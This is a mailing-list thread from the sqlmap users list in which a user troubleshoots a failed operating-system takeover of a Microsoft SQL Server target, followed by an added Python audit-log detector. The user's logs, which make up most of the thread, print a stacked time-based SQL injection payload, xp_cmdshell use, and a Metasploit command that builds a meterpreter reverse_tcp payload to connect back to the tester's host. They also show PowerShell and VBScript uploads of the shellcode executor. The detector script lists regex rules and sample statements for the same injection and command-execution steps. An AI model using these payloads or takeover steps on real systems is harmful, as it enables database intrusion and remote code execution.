Re: [sqlmap-users] Error with operating system takeover (meterpreter)
From: Peter L. <myp...@gm...> - 2015-07-02 09:55:36
Hi

This time I tried --flush-session as well and now it is showing that the parameter is not injectable; however, when I'm using the old session (-s old_sessionfile.sqlite) it is not showing this. I observed a similar issue a few days back when I tried to sqlinject the same vulnerable parameter using sqlmap from Computer-2; it failed to identify the vulnerability in the target parameter, while at the same time it was working with Computer-1. I did try --time-sec, -o etc. This is another weird issue in addition to the OS pwning.

--start--
sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf_newSession -v 2 --fresh-queries --flush-session
..
..
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level (4) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 31 to 40 columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 50 columns' because the level (5) is higher than the provided (1)
[05:20:28] [WARNING] POST parameter 'testNumber' is not injectable
[05:20:28] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

[*] shutting down at 05:20:28
--end--

On Thu, Jul 2, 2015 at 2:11 PM, Miroslav Stampar <mir...@gm...> wrote:

> In your case, 404 is indication that file has not been found in the expected place.
>
> Now I see that the temporary file path is not being "refreshed" by the --fresh-queries. Please rerun the whole case with the --flush-session
>
> Bye
>
> p.s. in your case sqlmap tried to upload the file to the trashy location because of previously retrieved faulty temp location
>
> On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...> wrote:
>
>> Hi,
>> Thanks for your reply.
>>
>> This time I tried with --fresh-queries without specific --techniques.
>>
>> Why am I getting the error "page not found (404)" again and again? Does it indicate that the file is being written but is deleted by Anti-Virus control or something, and that's why the 404 error is appearing while calling the uploaded file? Can this be the case? Need your opinion and expertise.
>>
>> Thanks
>>
>> --start---
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>>
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [11:12:52] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
>> [11:12:52] [INFO] creation in progress .................. done
>> [11:13:10] [DEBUG] the shellcode size is 308 bytes
>> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
>> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL injection technique
>> [11:13:10] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
>> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, please wait..
>> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
>> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
>> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
>> [11:13:12] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
>> [11:13:12] [INFO] retrieved:
>> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
>> [11:13:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
>> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] y
>> [11:13:15] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
>> [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait..
>> [11:13:16] [CRITICAL] page not found (404)
>> [11:13:16] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 11:13:16
>>
>> --end---
>>
>> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <mir...@gm...> wrote:
>>
>>> Hi.
>>>
>>> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. That way you'll kill the possibility to get perfectly valid results with other techniques
>>> 2) In current state, you've got some "trashy" characters (because of combination of laggy connection and stacked SQLi), like: "D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use --fresh-queries in such situations (once per run where you expect resume of trashy chars) to force sqlmap to try to retrieve the problematic value once again.
>>>
>>> Bye
>>>
>>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:
>>>
>>>> Hi All,
>>>>
>>>> In the first phase of our test we discovered the target URL is vulnerable and we managed to retrieve lots of information such as --users, --dbs, some of the --tables and lots more. All this retrieval was very slow, probably due to the time-based vulnerability; however, we tried all techniques (BEUSTQ) and found the same state.
>>>>
>>>> During an attempt a few days after our success we noticed that some of the parameters are not working and we are receiving errors; for instance, during a requery for --users we received the error "[09:39:23] [CRITICAL] unable to retrieve the number of database users". During a requery for -U sa --passwords we received "unnable to retrieve the password hashes for the database users (probably because the session user has no read privileges over the relevant system database table)".
>>>>
>>>> We moved to OS takeover; initially we got an error for xp_cmdshell, however we activated and confirmed it using SQLNinja and moved on to get --os-shell, executed some commands like "hostname", "whoami" and successfully retrieved their output.
>>>>
>>>> Now after a few minutes we noted that we are not getting any output of any command, with the message "No output".
>>>>
>>>> We moved to --os-pwn + --msf-path, but again with no success on meterpreter or VNC. We received the error "HTTP error codes detected during run: 404 (Not Found) - 1 times".
>>>>
>>>> I'm attaching the screen log, please help me with this if there is any scope available.
>>>> Thanks in Advance.
>>>>
>>>> -------screen logs start-------
>>>>
>>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2
>>>>          _
>>>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>>>> |_ -| . | |     | .'| . |
>>>> |___|_  |_|_|_|_|__,|  _|
>>>>       |_|           |_|   http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>>
>>>> [*] starting at 10:03:33
>>>>
>>>> mytarget_login
>>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>>> test_msf7
>>>> mytarget_login
>>>> /opt/metasploit/apps/pro/msf3
>>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>>> [10:03:33] [DEBUG] creating HTTP requests opener object
>>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>>> [10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
>>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
>>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>>> [10:03:33] [INFO] testing connection to the target URL
>>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>>> sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
>>>> redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
>>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
>>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
>>>> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
>>>> ---
>>>> Parameter: testNumber (POST)
>>>>     Type: stacked queries
>>>>     Title: Microsoft SQL Server/Sybase stacked queries
>>>>     Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>>> ---
>>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>>> back-end DBMS: Microsoft SQL Server 2008
>>>> how do you want to establish the tunnel?
>>>> [1] TCP: Metasploit Framework (default)
>>>> [2] ICMP: icmpsh - ICMP tunneling
>>>> > 1
>>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>>> [10:04:00] [INFO] testing if current user is DBA
>>>> [10:04:00] [DEBUG] creating a support table to write commands standard output to
>>>> [10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>>> [10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
>>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>>> which connection type do you want to use?
>>>> [1] Reverse TCP: Connect back from the database host to this machine (default)
>>>> [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
>>>> [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
>>>> [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
>>>> [5] Bind TCP: Listen on the database host for a connection
>>>> > 1
>>>> what is the local address? [192.168.1.8]
>>>> which local port number do you want to use? [61371]
>>>> which payload do you want to use?
>>>> [1] Meterpreter (default)
>>>> [2] Shell
>>>> [3] VNC
>>>> > 1
>>>> [10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>>> [10:04:17] [INFO] creation in progress .................. done
>>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL injection technique
>>>> [10:04:35] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt, please wait..
>>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmppsbcbi.ps1
>>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>>> [10:04:37] [INFO] retrieved:
>>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:37] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
>>>> do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] Y
>>>> [10:04:41] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfegab.txt, please wait..
>>>> [10:04:41] [CRITICAL] page not found (404)
>>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>>> 404 (Not Found) - 1 times
>>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
>>>>
>>>> [*] shutting down at 10:04:41
>>>>
>>>> root@kali:~#
>>>>
>>>> -------screen logs end-------
>>>>
>>>> Please help!!
>>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
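From the defender's side, the progression visible in the logs above (a stacked time-based vector on testNumber, then xp_cmdshell, then PowerShell writing files under the SQL Server directory) is what a statement-level SQL Server audit should surface. The following is an added example, not code from this thread or from sqlmap: it scans a handful of constructed audit lines ("<time> <login> <statement>"; the logins webapp and reports, the timestamps and the rule names are all made up here) and escalates when one login shows both inference and OS command execution.

```python
import re

# Constructed sample of statements as exported from a SQL Server audit / Extended
# Events session: "<time> <login> <statement>". The payload shapes mirror the thread
# (stacked WAITFOR DELAY on testNumber, then xp_cmdshell + PowerShell file writes);
# the lines, timestamps and logins themselves are made up for this example.
SAMPLE_AUDIT = r"""
2015-07-02T10:03:56 webapp SELECT * FROM logins WHERE testNumber='333333333333'; WAITFOR DELAY '0:0:5'--' AND testPassword='3243'
2015-07-02T10:03:57 webapp SELECT * FROM logins WHERE testNumber='1'; IF(1=1) WAITFOR DELAY '0:0:5'--'
2015-07-02T10:04:00 webapp EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
2015-07-02T10:04:04 webapp EXEC master..xp_cmdshell 'powershell -File "D:\Program Files\Microsoft SQL Server\tmppsbcbi.ps1"'
2015-07-02T10:05:10 reports SELECT COUNT(*) FROM orders WHERE status='open'
"""

# (rule name, pattern); names are invented for this example.
RULES = [
    ("time_based_inference", re.compile(r"WAITFOR\s+DELAY\s+'\d+:\d+:\d+'", re.I)),
    ("stacked_query_after_quote", re.compile(r"'\s*;\s*(IF|WAITFOR|EXEC|DECLARE)\b", re.I)),
    ("xp_cmdshell_enable", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell_exec", re.compile(r"xp_cmdshell\s+'", re.I)),
    ("powershell_from_dbms", re.compile(r"\bpowershell\b", re.I)),
]

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")

def scan_audit(text):
    """Return (timestamp, login, [matched rule names]) for each suspicious statement."""
    findings = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not have the expected three fields
        ts, login, stmt = m.groups()
        hits = [name for name, rx in RULES if rx.search(stmt)]
        if hits:
            findings.append((ts, login, hits))
    return findings

def classify(findings):
    """Per login: 'os_takeover' once both time-based inference and xp_cmdshell
    execution have been seen (the progression in the thread), else 'probing'."""
    seen = {}
    for _, login, hits in findings:
        seen.setdefault(login, set()).update(hits)
    return {login: ("os_takeover" if {"time_based_inference", "xp_cmdshell_exec"} <= rules
                    else "probing") for login, rules in seen.items()}

if __name__ == "__main__":
    for ts, login, hits in scan_audit(SAMPLE_AUDIT):
        print(ts, login, ", ".join(hits))
    print(classify(scan_audit(SAMPLE_AUDIT)))
```

Note that the `reports` login, whose single statement matches nothing, never appears in the classification, so the output points straight at the application login whose statements moved from timing inference to command execution.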